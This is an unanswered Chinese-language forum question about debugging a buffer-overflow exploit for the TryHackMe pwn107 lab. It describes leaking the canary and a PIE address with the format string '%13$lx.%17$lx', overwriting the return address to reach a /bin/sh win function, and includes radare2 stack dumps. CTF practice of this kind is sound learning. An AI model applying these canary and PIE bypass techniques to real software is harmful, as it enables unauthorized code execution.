提问人:Christian Sanchez 提问时间:10/30/2023 更新时间:10/30/2023 访问量:11
使用 ret2get_address() 调试缓冲区溢出
Debugging a buffer overflow using ret2get_address()
问:
我正在尝试利用 TryHackMe > PWN101 > pwn107 的缓冲区溢出。
该漏洞利用格式字符串漏洞泄露金丝雀和动态地址,以便我们可以将地址计算为 get_address() 又名。我们的 win 函数(包含 /bin/sh),并劫持返回地址。我们还必须用金丝雀本身覆盖它。
我正在用 python 编写我的漏洞,使用 pwntools 并使用 radare2 进行调试。
该文件具有 PIE、NX 和金丝雀。
我已经成功泄露了金丝雀和main的动态地址。(好吧,我真的认为它是主要的,因为它在 radare2 中显示为:0x7ffd3045a928 0x0000560418400992 [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text main,main,r13,r9 main program R X 'push rbp' 'pwn107.pwn107'
我可以成功覆盖金丝雀,因为我没有收到“堆栈粉碎”错误。
通过发送格式字符串 “%13$lx.%17$lx”,我们的堆栈如下所示:
[0x560418400a36]> pxr @ rsp
0x7ffd3045a8d0 0x252e786c24333125 %13$lx.% @ rsp ascii ('%')
0x7ffd3045a8d8 0x00000a786c243731 17$lx...
0x7ffd3045a8e0 0x0000000000000002 ........ 2
0x7ffd3045a8e8 0x000000000f8bfbff ........ 260832255
0x7ffd3045a8f0 0x00007ffd3045ad29 ).E0.... [stack] stack R W 0x34365f363878 x86_64
0x7ffd3045a8f8 0x0000000000000064 d....... 100 ascii ('d')
0x7ffd3045a900 0x0000000000001000 ........ 4096
0x7ffd3045a908 0xd0f326fd5de89c00 ...].&..
0x7ffd3045a910 0x0000000000000001 ........ @ rbp 1
0x7ffd3045a918 0x00007f5b1f029d90 ....[... /usr/lib/x86_64-linux-gnu/libc.so.6 library R X 'mov edi, eax' 'libc.so.6'
0x7ffd3045a920 ..[ null bytes ].. 00000000
0x7ffd3045a928 0x0000560418400992 [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text main,main,r13,r9 main program R X 'push rbp' 'pwn107.pwn107'
0x7ffd3045a930 0x000000013045aa10 ..E0.... 5104839184
0x7ffd3045a938 0x00007ffd3045aa28 (.E0.... [stack] r12 stack R W 0x7ffd3045c3d6
0x7ffd3045a940 ..[ null bytes ].. 00000000
0x7ffd3045a948 0x30f586575c89a646 F..\W..0
0x7ffd3045a950 0x00007ffd3045aa28 (.E0.... [stack] r12 stack R W 0x7ffd3045c3d6
0x7ffd3045a958 0x0000560418400992 [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text main,main,r13,r9 main program R X 'push rbp' 'pwn107.pwn107'
0x7ffd3045a960 ..[ null bytes ].. 00000000
*** deleted irrelevant lines***
我们的金丝雀位于: 0x7ffd3045a908 退货地址:0x7ffd3045a918 我们将泄漏以绕过 PIE 的 main() 地址位于:0x7ffd3045a928
然后,在成功泄漏 main() 的 canary 和地址后,我们的堆栈如下所示:
[0x560418400a36]> pxr @ rsp
0x7ffd3045a8d0 0x252e786c24333125 %13$lx.% @ rsp ascii ('%')
0x7ffd3045a8d8 0x00000a786c243731 17$lx...
0x7ffd3045a8e0 0x0000000000000002 ........ 2
0x7ffd3045a8e8 0x000000000f8bfbff ........ 260832255
0x7ffd3045a8f0 0x4141414141414141 AAAAAAAA @ rsi ascii ('A')
0x7ffd3045a8f8 0x4141414141414141 AAAAAAAA ascii ('A')
0x7ffd3045a900 0x4141414141414141 AAAAAAAA ascii ('A')
0x7ffd3045a908 0xd0f326fd5de89c00 ...].&..
0x7ffd3045a910 0x4242424242424242 BBBBBBBB @ rbp ascii ('B')
0x7ffd3045a918 0x00000000000006fe ........ 1790
0x7ffd3045a920 0x000056041840094c [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text get_streak sym.get_streak program R X 'push rbp' 'pwn107.pwn107'
0x7ffd3045a928 0x000056041840090a [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text sym.setup program R X 'add eax, 0xfffe10e8' 'pwn107.pwn107'
*** deleted irrelevant lines***
正如你所看到的,金丝雀被正确地覆盖了,rbp被覆盖了,一个ret小工具(用于堆栈对齐),然后我们正确地劫持了返回地址。那么,为什么外壳没有被弹出呢?
答: 暂无答案
评论